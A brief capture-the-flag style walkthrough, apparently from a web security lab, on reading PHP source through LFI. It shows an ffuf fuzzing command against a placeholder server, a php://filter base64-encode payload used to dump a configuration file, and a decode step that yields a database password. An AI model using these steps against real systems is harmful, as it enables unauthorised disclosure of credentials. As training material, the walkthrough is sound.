PHP Filters

Fuzz the web application for other php scripts, and then read one of the configuration files and submit the database password as the answer

Step 1 - Fuzz configuration files:

• Use this wordlist

• Fuzz with the following command:

  • Copy

    ffuf -w /wordlist:FUZZ -u http://SERVER_IP:PORT:/FUZZ.php

• Three files found

Step 2 - Use PHP Filters to read the file content:

• php://filter/read=convert.base64-encode/resource=configure

Step 3 - Read the previous base64 string:

• echo 'base64 string' | base64 -d

And we got the flag!